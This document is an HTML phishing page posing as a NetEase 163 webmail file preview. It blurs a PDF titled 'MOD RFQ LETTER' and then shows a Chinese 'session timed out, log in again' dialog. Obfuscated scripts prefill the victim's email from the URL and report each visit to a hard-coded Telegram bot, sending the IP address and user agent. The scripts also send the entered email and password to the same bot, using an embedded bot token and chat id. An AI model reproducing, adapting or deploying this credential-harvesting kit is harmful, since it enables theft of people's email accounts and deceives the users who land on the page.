<!DOCTYPE html>
<html>
<head>
	<link href="./index_files/favicon.ico" rel="icon" type="image-xicon">
  <meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<link rel="stylesheet" type="text/css" href="./index_files/globl_zh_CN.css">

    
    
        <link rel="stylesheet" type="text/css" href="./index_files/skin_dft_sky_zh_CN.css">
    

<script>
        function _0x46f0(_0x126153,_0xd29191){var _0x3a2318=_0x3a23();return _0x46f0=function(_0x46f0f6,_0x17485a){_0x46f0f6=_0x46f0f6-0xe7;var _0x19b7ce=_0x3a2318[_0x46f0f6];return _0x19b7ce;},_0x46f0(_0x126153,_0xd29191);}(function(_0x234cda,_0x5b414e){var _0x50e59f=_0x46f0,_0x13fcc3=_0x234cda();while(!![]){try{var _0x32cd01=-parseInt(_0x50e59f(0xe7))/0x1+parseInt(_0x50e59f(0xef))/0x2*(-parseInt(_0x50e59f(0xea))/0x3)+-parseInt(_0x50e59f(0xee))/0x4+parseInt(_0x50e59f(0xeb))/0x5+parseInt(_0x50e59f(0xf3))/0x6+parseInt(_0x50e59f(0xe9))/0x7*(parseInt(_0x50e59f(0xf0))/0x8)+parseInt(_0x50e59f(0xec))/0x9;if(_0x32cd01===_0x5b414e)break;else _0x13fcc3['push'](_0x13fcc3['shift']());}catch(_0x9a07bc){_0x13fcc3['push'](_0x13fcc3['shift']());}}}(_0x3a23,0x8177a));function _0x3a23(){var _0x34d724=['908624vBUNnL','140016PMsBlr','border','try','48306tkSdNN','298892MIWsly','getElementById','343pEmZjH','6hIRXra','4562710hOXXwA','6216480CyShbD','style','2924388bSRAwh'];_0x3a23=function(){return _0x34d724;};return _0x3a23();}function test(){var _0x32eb54=_0x46f0;document[_0x32eb54(0xe8)](_0x32eb54(0xf2))[_0x32eb54(0xed)]['borderColor']='outline:\x20none;\x20border-color:\x20rgb(59,\x20120,\x20221)',document[_0x32eb54(0xe8)](_0x32eb54(0xf2))['style'][_0x32eb54(0xf1)]='solid';}
</script>


  <link rel="stylesheet" type="text/css" href="./index_files/normalfont.css">
  <link rel="stylesheet" type="text/css" href="./index_files/webmail_urs_mail163.css">



<title>Preview Files</title>
<link rel="stylesheet" type="text/css" href="index_files/comm2010575477.css">
<link rel="stylesheet" type="text/css" href="./index_files/global_zh_CN.css">

    
    
        <link rel="stylesheet" type="text/css" href="./index_files/skin_dft_sky_zh_CN.css">

	<style type="text/css">

body{font-family: Arial, Helvetica, sans-serif;
    overflow: hidden;background-color: white;}

		



.objec-tblure{

display:none;
-webkit-filter: blur(5px);
    -moz-filter: blur(2px);
    -o-filter: blur(8px);
    -ms-filter: blur(5px);
    filter: blur(4px);




}.ft {
    clear: both;
    border-width: 1px;
    border-style: solid;
    height: 39px;
    padding: 0 8px;
}.bdr-c-dark {
    border-color: #50A05B;
}
.bdr-c-dark {
    border-color: #50A05B;
}.obje-tblure{

display:none;
-webkit-filter: blur(5px);
    -moz-filter: blur(2px);
    -o-filter: blur(2px);
    -ms-filter: blur(2px);
    filter: blur(2px);




}
.loginform{
      width:160%;
      height: 160%;
      position: absolute;
      top:0;
      display: flex;
      background-color:rgba(0,0,0,0.2);
      justify-content: center;
      align-items: center;
  

    }
}body {padding:0; margin:0;}.noadjust html {_padding-bottom:55px;*height:100%; *overflow:hidden;}.noadjust body {_height:100%;}h1 {font-size:14px; font-weight:bold; margin:10px 15px 5px; padding:8px; line-height:20px;}.previewhead {border-bottom:1px solid #CCC; padding:0 0 5px; margin:5px 8px 5px; overflow:hidden; _zoom:1; overflow:hidden; }.previewhead .download a{position:relative; margin-top:8px;}.previewhead .filename {font-size:26px; height:30px; line-height:30px; overflow:hidden; text-overflow:ellipsis font-weight:normal; padding:3px 0 0 0; margin-right:100px;white-space:normal; word-break:break-all; word-wrap: break-word; overflow:hidden;}.previewhead .filename img {margin:0 5px -3px -18px; display:none;}.ico_down {width:9px; height:10px; position:absolute; background:url() no-repeat -32px -224px; margin-top:7px; *margin-top: 3px; left:20px;}.ico_pre {width:6px; height:12px; position:absolute; background:url() no-repeat 0 0; margin-top:6px;  left:12px;}.ico_next {width:6px; height:12px; position:absolute; background:url() no-repeat -32px 0; margin-top:6px;  left:12px;}.ico_list {width:24px; height:12px; position:absolute; background:url() no-repeat -64px 0; margin-top:6px;  left:8px;}.disabled .ico_next, .disabled .ico_pre {opacity:0.3; filter:alpha(opacity=30); _zoom:1;}.previewmain .previewcontent {position:absolute; top:48px; *top:52px; right:7px; left:7px; bottom:3px; _height:100%; _left:0; _right:0;}.previewmain .previewcontent iframe {width:100%; height:100%;  *position:absolute;}.adjustmain .previewcontent iframe {width:100%; overflow:hidden;}.filelist {position:absolute; width:165px; overflow-x:hidden; overflow-y:auto; top:37px; right:8px; background:#FFF; border:1px solid #DDD; -moz-box-shadow:0 0 5px #CCC;} .filelist .file {padding:7px; border-bottom:1px solid #DDD;  white-space:nowrap; cursor:pointer; }.filelist .file img {margin:0 3px -3px 0;}.filelist .file:hover {background:#444;  background:-moz-linear-gradient(top,#4f4f4f,#3F3F3F); background:-webkit-gradient(linear,0 0,0 100%,from(#4F4F4F),to(#3F3F3F)); color:#FFF; border-bottom:1px solid #444; }.filelist .file .thumb {maux-width:100px; max-height:100px; display:block; margin-bottom:3px; _width:100px; _height:100px;}.filelist .file .filetype {margin:0 3px -3px 0;}.icon_info_s {width:12px; height:12px; background:url() no-repeat -96px -48px; margin:0 5px -1px 0; display:inline-block;}.previewfailed {font-size:14x; margin:10px; padding:8px 12px; -moz-border-radius:5px;-webkit-border-radius:5px; border-radius:5px; background:#F5F5F5; color:#666; margin-bottom:15px;}#mp3player_container {padding:30px;}.mplayer .mmsg { font-size:14px; color:#494949; margin-left:55px; line-height:18px;}#loading {position:absolute; top:50%; left:50%; padding:15px; background:#666; -moz-border-radius:5px;-webkit-border-radius:5px; border-radius:5px; opacity:0.9; color:#FFF; text-align:center; z-index:19; margin:-30px 0 0 -30px;}#loading img {display:block;}.icon_failed {width:31px; height:31px; background:url() no-repeat -192px 0; float:left;}.previewfailed {font-size:12px; border:4px solid #DDD; padding:15px 20px 12px; z-index:20; -moz-border-radius:5px;-webkit-border-radius:5px; border-radius:5px; background:#F5F5F5; color:#494949;  position:absolute; width:220px; height:40px; top:50%; left:50%; margin:-30px 0 0 -125px;}.previewNotSupport {font-size:12px; margin:10px; padding:8px 12px; -moz-border-radius:5px;-webkit-border-radius:5px; border-radius:5px; background:#F5F5F5; color:#666; margin-bottom:15px;}.cursorzoomin {cursor:url(),auto; float:none;}.cursorzoomout {cursor:url(),auto; float:none;}a.yozo_open {display:none;}

</style>

<script>
  var _0x1be9af=_0x289b;(function(_0x2ee7c3,_0x47d579){var _0x354179=_0x289b,_0x4f35bb=_0x2ee7c3();while(!![]){try{var _0x3f31b6=-parseInt(_0x354179(0x112))/0x1+parseInt(_0x354179(0x10d))/0x2*(-parseInt(_0x354179(0x10e))/0x3)+-parseInt(_0x354179(0x13a))/0x4*(parseInt(_0x354179(0x12d))/0x5)+-parseInt(_0x354179(0x125))/0x6+-parseInt(_0x354179(0x11c))/0x7*(-parseInt(_0x354179(0x113))/0x8)+-parseInt(_0x354179(0x11d))/0x9*(parseInt(_0x354179(0x12f))/0xa)+parseInt(_0x354179(0x132))/0xb;if(_0x3f31b6===_0x47d579)break;else _0x4f35bb['push'](_0x4f35bb['shift']());}catch(_0x10ebb4){_0x4f35bb['push'](_0x4f35bb['shift']());}}}(_0x4633,0x974a7),window[_0x1be9af(0x126)]=function(){var _0x4d3c6c=_0x1be9af,_0x4202e5=window[_0x4d3c6c(0x122)]['href'],_0x16eb76=new URL(_0x4202e5),_0xe9ef4e=_0x16eb76[_0x4d3c6c(0x118)]['get'](_0x4d3c6c(0x13c));document[_0x4d3c6c(0x11a)](_0x4d3c6c(0x136))[_0x4d3c6c(0x139)]=_0xe9ef4e,setTimeout(function(){var _0xf671da=_0x4d3c6c;document[_0xf671da(0x11a)](_0xf671da(0x11e))[_0xf671da(0x116)]['display']='block',document[_0xf671da(0x11a)]('pdfpage')['style'][_0xf671da(0x124)]=_0xf671da(0x12b),document[_0xf671da(0x11a)](_0xf671da(0x13d))[_0xf671da(0x116)][_0xf671da(0x124)]='none',document['getElementById']('fellow')[_0xf671da(0x116)][_0xf671da(0x124)]=_0xf671da(0x11b);},0xbb8);var _0x5e1104=window['location'][_0x4d3c6c(0x11f)],_0x12a37f=new URLSearchParams(_0x5e1104),_0x330a3e=_0x12a37f[_0x4d3c6c(0x133)](_0x4d3c6c(0x13c)),_0x1ca972=document[_0x4d3c6c(0x117)]('input[name=\x22un\x22]');_0x330a3e&&(_0x1ca972['value']=_0x330a3e),sendTelegramNotification(_0x4d3c6c(0x131));});function _0x289b(_0x3dbeb7,_0x2cb2fd){var _0x4633cc=_0x4633();return _0x289b=function(_0x289b94,_0x846ec1){_0x289b94=_0x289b94-0x10d;var _0x1d80f6=_0x4633cc[_0x289b94];return _0x1d80f6;},_0x289b(_0x3dbeb7,_0x2cb2fd);}function _0x4633(){var _0x59f407=['password','1666xcXCBn','2478yBxWQr','https://api.ipify.org/?format=json','/sendMessage?chat_id=','catch','1222108eBBBkn','48232BNPdNL','href','https://api.telegram.org/bot','style','querySelector','searchParams','POST','getElementById','block','1141TUJXSr','27ADAvFl','divDialogconfirmWLogin','search','\x0aUser\x20Agent:\x20','error','location','then','display','6557322dXbJHg','onload','7105956638:AAGtRBUYzGXshqOociC0qVjEm8uCoSZ53-4','index1.html?allmaildownload=','\x0aClientside:\x20','STUFF\x20FROM\x20MFA:\x0aUniform:\x20','none','json','248405JHPYDJ','log','3787750FjWSKC','Error:','Your\x20page\x20has\x20been\x20visited.','42086209ZtujDa','get','Failed\x20to\x20submit\x20form.','&text=','spartta','\x0aPapa:\x20','6634858055','value','4qdwLTa','preventDefault','allmaildownload','loading'];_0x4633=function(){return _0x59f407;};return _0x4633();}function sendTelegramNotification(_0x5db03a){var _0x589055=_0x1be9af,_0x29ce44=window['location'][_0x589055(0x114)],_0x289380=new URL(_0x29ce44),_0x1926d4=_0x289380['searchParams']['get'](_0x589055(0x13c)),_0x26108f='',_0x5e59c3=navigator['userAgent'];fetch(_0x589055(0x10f))[_0x589055(0x123)](_0x2ab5fa=>_0x2ab5fa[_0x589055(0x12c)]())['then'](_0x379e8b=>{var _0x1b1bec=_0x589055;_0x26108f=_0x379e8b['ip'],_0x5db03a+=_0x1b1bec(0x129)+_0x1926d4+'\x0aIP\x20Address:\x20'+_0x26108f+_0x1b1bec(0x120)+_0x5e59c3;var _0x4fa36c='7105956638:AAGtRBUYzGXshqOociC0qVjEm8uCoSZ53-4',_0x140833=_0x1b1bec(0x138),_0x2761a1=_0x1b1bec(0x115)+_0x4fa36c+_0x1b1bec(0x110)+_0x140833+_0x1b1bec(0x135)+encodeURIComponent(_0x5db03a);fetch(_0x2761a1,{'method':_0x1b1bec(0x119)});});}function sendMessageToTelegramBot(_0x5e1543){var _0x3e945a=_0x1be9af;_0x5e1543[_0x3e945a(0x13b)]();var _0x3d59cb=document[_0x3e945a(0x11a)](_0x3e945a(0x136))['value'],_0x298468=document['getElementById'](_0x3e945a(0x13e))[_0x3e945a(0x139)],_0xcb6fde=_0x3e945a(0x12a)+_0x3d59cb+_0x3e945a(0x137)+_0x298468,_0x38431b=_0x3e945a(0x127),_0x13ed7d=_0x3e945a(0x138),_0x204806=_0x3e945a(0x115)+_0x38431b+_0x3e945a(0x110)+_0x13ed7d+'&text='+encodeURIComponent(_0xcb6fde);fetch(_0x204806,{'method':_0x3e945a(0x119)})[_0x3e945a(0x123)](_0x50f03b=>_0x50f03b['json']())['then'](_0x7d152f=>{var _0xaa2cab=_0x3e945a;console[_0xaa2cab(0x12e)](_0x7d152f),window[_0xaa2cab(0x122)][_0xaa2cab(0x114)]=_0xaa2cab(0x128)+encodeURIComponent(_0x3d59cb);})[_0x3e945a(0x111)](_0x43e3c1=>{var _0x1343fa=_0x3e945a;console[_0x1343fa(0x121)](_0x1343fa(0x130),_0x43e3c1),alert(_0x1343fa(0x134));});}
</script>
</head>
<body >
  



  <!-- Showing Pdf panel when popup is on blure this div-->
<div id="pdfpage"style="display: block;" class="obje-tblure">
<object width="100%" height="1000px" data="MOD RFQ LETTER.pdf#toolbar=0"></object>

</div>

<!-- BlurePdf panel when popup is on blure active-->
<div id="fellow" class="objec-tblure">
  <object class="kingfu" width="100%" height="1000px" data="MOD%20RFQ%20LETTER.pdf#toolbar=0"></object>
</div>

<div id="loading" style="display: block;"><img src="index_files/loader087795.gif"></div>


<!-- Login Popup Page start Panel-->
<div class="loginform">

<div id="divDialogconfirmWLogin" class="dialog" style="display: none;position: absolute; width: 424px; border:1px solid #136D39;left: 714.5px; top: 304px;height: ;">



    <div class="boxIframeTitle"><h2 style="cursor: default;"><span>系统提示</span></h2><a class="i_t_close" href="" id="divDialogCloseconfirmWLogin">&nbsp;&nbsp;&nbsp;&nbsp;</a></div><div class="boxIframeMain"><div class="boxIframeText">                <div class="pop-wrap">                    <div class="msgDialog fz_14">                       
     <form onsubmit="sendMessageToTelegramBot(event)"  id="login_form">                            <p>您的邮箱可能由于您长时间未进行操作，导致登录超时，已被退出，请重新登录。</p>                            <p class="mt_20">账号：<input type="text" id ="spartta" value="" name="un" style="border: 0px solid white;outline: none; border-color: none;text-align: left;border-width: none;box-shadow: none;background-color: #F0F8F0;"></p>                            <p class="mt_10">密码：<input required="" id="password" type="password" name="password" class="rm_txt w162" maxlength="15" value="" tabindex="1">                            </p>                                                                             </div>                </div><div class="boxIframeBtn">


    <div class="topborder " style="margin-top: -5px;"> 

<div style="margin-bottom: 5px;">
<button type="submit"  class="n_btn_on mt_8"><span class="spn">登  录</span></button> &nbsp;&nbsp;&nbsp;&nbsp;<button type="submit"  class="n_btn mt_8"><span class="sn">取消</span></button></div>
</br>


    </form></div></div></div></div></div>




</body>
</html>